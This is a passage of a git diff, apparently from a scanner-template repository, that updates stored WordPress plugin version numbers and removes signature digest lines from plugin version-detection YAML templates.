http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 211 files changed, 11 insertions(+), 211 deletions(-) diff --git a/helpers/wordpress/plugins/admin-menu-editor.txt b/helpers/wordpress/plugins/admin-menu-editor.txt index 69669de698..c56eaaaf45 100644 --- a/helpers/wordpress/plugins/admin-menu-editor.txt +++ b/helpers/wordpress/plugins/admin-menu-editor.txt @@ -1 +1 @@ -1.12.2 \ No newline at end of file +1.12.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index a6695ff98b..bbdf097e50 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -4.3.4 \ No newline at end of file +4.3.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/breeze.txt b/helpers/wordpress/plugins/breeze.txt index b88e5006fb..41bb57bd66 100644 --- a/helpers/wordpress/plugins/breeze.txt +++ b/helpers/wordpress/plugins/breeze.txt @@ -1 +1 @@ -2.1.9 \ No newline at end of file +2.1.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index cac9abc1c5..521c7e6950 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.9.24 \ No newline at end of file +5.9.25 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index 92443952ac..860251185a 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.31 \ No newline at end of file +1.32.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt index 2acb8082d9..ab9da2702d 100644 --- a/helpers/wordpress/plugins/jetpack.txt +++ b/helpers/wordpress/plugins/jetpack.txt @@ -1 +1 @@ -13.5 \ No newline at end of file +13.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 155a6e113f..0e80dcd62e 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.53.0 \ No newline at end of file +4.54.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt index 76d1514dde..c55621169c 100644 --- a/helpers/wordpress/plugins/meta-box.txt +++ b/helpers/wordpress/plugins/meta-box.txt @@ -1 +1 @@ -5.9.9 \ No newline at end of file +5.9.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index d6880ca440..d667599f26 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.35 \ No newline at end of file +4.10.36 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index 914ec96711..b8d12d7371 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.6.0 \ No newline at end of file +2.6.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt index 82bcaddc06..4266d86348 100644 --- a/helpers/wordpress/plugins/wordpress-seo.txt +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -1 +1 @@ -22.9 \ No newline at end of file +23.0 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 4b64246160..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d10cf69c3dee5912f7378c7fc7380fb343866ff57c195c08a9fb672a56f8d9ed02206ec172f8991f4281091a9a9715a442bcd92521297542f15d17b43000f2a5af7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 4cf686a540..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022047b381d0c59dc7a3997f3438daebfead565eb8d313cf02a7589bb5e33da2823e022100ec4e854b627fa1f562beb3e66e2d7ea9d947e077761e187cff1b8140c600f206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 8c6228404a..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085a4dad8ccd1fd635c9ef0600cce0d410514902316c4af289ff261c6b295ec0b022100b7cfffec498aeea1cc1a6ddfbc9d8709b5a0c3c2b433705ba3a7f88e5be6f2ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e12d992bcc..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ba955bfb6c7ed350c946ff06c5d1eb876997dc52eb2a961154c72c4c938c9d44022073d64c2604c42dd0921e40b88af78aa517210c958b22a04f251bd68014d145f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 0f976fb886..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009d79f747c9d09c26fb1d324f7c534b4bb2b2ca80635bc03b86800b42d7f88fb4022100b9542f468531a8eeacb0806d25a109612935101033c532f07b0499a20e3e586b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index e25a5b8f77..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc2e9fc806ef996a9fb928ccc50d83347f0c42542417147a265c88d1a05ddf7a022100f5ccfb0d09244ceb16f3866e4f29d9e4fd8dd4f066c9f9a71a7ecc06001ed141:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index ef7206bf13..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204755b2020641a9875f8181a3bc92fdab8e66ca5766ca030cac3aebd6f7912b9d02210084e3840ab04a3f73d8c65e94d11372a07ba9858a2d3f5034643d0448cb5e7562:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 564360fc8e..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022060b018d8390bef628dd15e504af567e07763406d337a070f68631dd4732f5340022100e0c3b60481eb69de36be6f6b66fc17315dd30bd7821b024dbc953aa704b7ad39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index f96cf38a8c..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c18330a236c8bc3dd7a6d15b2dc90ef5d852ca209b28751f9d6527c8bbe1929c022100f6d9949dbeb133f13d8915cdaf60ca809cca6d0d55505713b0b4a912dd0ca0f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 7b0707ac68..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008dcadedb303a47ef4be55b7c98ba72906c0a1128d398ffc77793143ac0f9a64f02207df73cd57c210ad68d3773be0630fc569dda3b2eb408d43f7807c553a333615d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 3451e1c20c..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100babba5667c802615c0a6831df9989614f98cbd1c2cbc12ce7f5dc12323c9ef32022100f63fdff583bdc525bd905e399205ec9e59dd9b8303df48789244286c9aa9806f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index a44477e393..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc2e3aac5a545e24ea481689aa5d6b596485a7948e3d75ec26be47ddd1e8871502207e7901b143273e73611a8ea19807f02f4c98f0e37b1eaf3887f781a7f95e58f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index f94bca3a7c..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220556b0f8362eabc6cd16c6729ef444eacf70336ebd4b0c86de628666603f65bb702205c581b4335316a2b0fda0388c9ef9a68363117d557ccbb59489564c0cfb84855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 1bc04d395b..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206eb705b1c62f0921e2b5b7d8eb6c4648713e20d5cd34d07b3eeba8e646daf4cc02203d3d3246a9e00f040948cd7811828ce114d829579dfa713addbc6906fa6110e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index e843872950..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009c98d299ad1d45e385fc0b2189b239407f904f933cb5133be25a1cb31f2ceb6e022100bcbcf82f6eeaebdc13aec5df91a6ba5e10410cd03a8f83eaafb265b633b24a65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 264e4651d2..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b912809bb1b8322f6a8214838eb599abc296a5347535c33215539b0ea1ce7a2c022100b14200b1fb7a0089f94830ea0c0e7ddfd6e83d82f92a311e4fd20675f5a31669:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index a212c2e8e0..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008d6d4a5c48462d21f08cbe7d72fa82aa0a192cd9430fc718a5d62bf40be42dee022100e64a042fcece052173be1f0386c1dee5b6275fefcc9f9c3052ad299074eaf3fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index d6e9c2ac98..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd1325549815a79744c8bbf2cebfd6a4b887910c8239b2ef8d2c6e7ccc80c697022100c13a9c2290c60c7ba3a6320f82012b3f61f853fb07bda275439b0c87c311cbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f5e18cdb12..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b807d1b4189ea81419b5c342ee2df0dde8c1fd44e6b437fce35fcddcd3de14f8022100de8971490178dec66d2b360d1fc23887604129a6bade74fa2d036a9ca6548619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 8ce1d7f14d..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002a15f0769987b4bf9a35fad58868c9e9caad9233cfd889732e3b40e039006f3022100b46eae88b205d1bf9557d8025cceab130e325a7b2426203b0f1e2963a4d459ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index a4ac534680..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa2665d1250de05a27994b88070d5aaeba08925821739f9a121cf37cb63a873a02201ed4998598265dd6f08c78c280457ad2ee10e1bca445f5a41cc9e87a07f8de77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index b081eab8c9..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204753bee5193dc065ab267d031ac054b31317269474782dd5c0360ecdcad9fcf30221009b53759a934d95706eaad11416ea1f12dc8918a9c5588279932ed26eed558416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index f04c2dc81f..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d464f0f1cace72ac8b9012705e883eb6053d1d989c534eb229a24d6c4bd0164e022100cc2e0bcb51b123d904de9603b10a963c6b75bc232849123e31bc7db3d201f867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index c225c58c4c..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e00fa10db61c46e1a1ff3ae226def6a203fc69b9ecd972661cac1a8acd8ff54f02201e867d26c9b1266753717cebf0f855ca1b0989c65cc5c209db626c029abf42c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 8e9255e7ca..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d45ea205d0c56582b150d7fac04b3d8a2d610cbbb9d54debda925cc482d7ff7a02200177c5c652c10f2ac24eec892e152b00845d6b88b403cda0f365ccb6b951843d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 86e28e22db..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e3d0eba25e14e330a0e39c21068f87c72c09dce2161c655de60fe33fd4a088900220452a100a22e2785017fa27f159a052a2dad5e002713732c20398be51abba893e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 8b290957aa..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ea556c92114c4a85d544ac00da5618104006580e7332d58aab91f5cc997d57ab02206864a12b365698b05b4e3047aa864862b96080a5e382ab9e18c5a54c6ea89f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 944ba3801f..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d50163e8f3f2d90ebe582b1eb33c4e3f66d6f91e7b5948acf2d35bbb95794e65022100ddfb2cf079e25789a3edd73f9a541170c3b405d680af8dc8692a8ea584b04130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index cf6832b727..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bb62dcec58eeefaaddf1079d807e45e65b86dcd4ab4d0fea4dc3180203c5252502200596fcd3b331ffa5bf23cc926524853c6d49b8affc0baa699d7b34b58f316289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 34ec2276d7..4afaf9dc97 100644 --- 